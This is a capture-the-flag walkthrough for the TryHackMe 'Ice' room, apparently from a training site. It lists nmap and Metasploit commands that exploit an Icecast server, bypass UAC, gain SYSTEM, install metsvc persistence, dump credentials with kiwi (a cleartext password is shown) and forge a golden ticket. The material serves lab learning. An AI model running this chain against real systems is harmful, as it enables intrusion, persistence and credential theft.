Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


05/12/2024 Shad Hussain Knowledge Views 187 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Ice - THM 

Room Link : https://tryhackme.com/r/room/ice


STEP1
nmap -Pn -sSV 10.10.98.252
FINDING
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http         Icecast streaming media server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
-------------------------------------------------------------------------------------------------------
STEP2
msfconsole -q
search icecast
use exploit(windows/http/icecast_header)
set options and exploit 
bg the session
-------------------------------------------------------------------------------------------------------
STEP3
search exploit suggester
use post(multi/recon/local_exploit_suggester)
set SESSION
and run
-------------------------------------------------------------------------------------------------------
STEP4
USE exploit/windows/local/bypassuac_eventvwr
set SESSION
set LHOST
run
-------------------------------------------------------------------------------------------------------
STEP5
sessions -i 2
getprivs
SeTakeOwnershipPrivilege -- do nothing
ps -- to check processing running
migrate process id to merge with malicious exploit
shell
whoami
nt authority\system -- we are root or admin of the machine
-------------------------------------------------------------------------------------------------------
STEP6 (OPTIONS)
in meterpreter
run metsvc -A -- to keep the persistence even after restart the machine
-------------------------------------------------------------------------------------------------------
STEP7
in meterpreter
load kiwi -- is advance version of mimikatz -- it will also expland help menu
creds_all -- to get all the users and password
FINDING
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)
-------------------------------------------------------------------------------------------------------
STEP8
in meterpreter
golden_ticket_create -- allowing us to authenticate anywhere with ease
dir *.txt /s -- search al .txt files
dir flag* /s /p -- search flag.txt file
dir /s /b flag.txt
-------------------------------------------------------------------------------------------------------

No article(s) with matching content

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 




© mutebreak.com | All Rights Reserved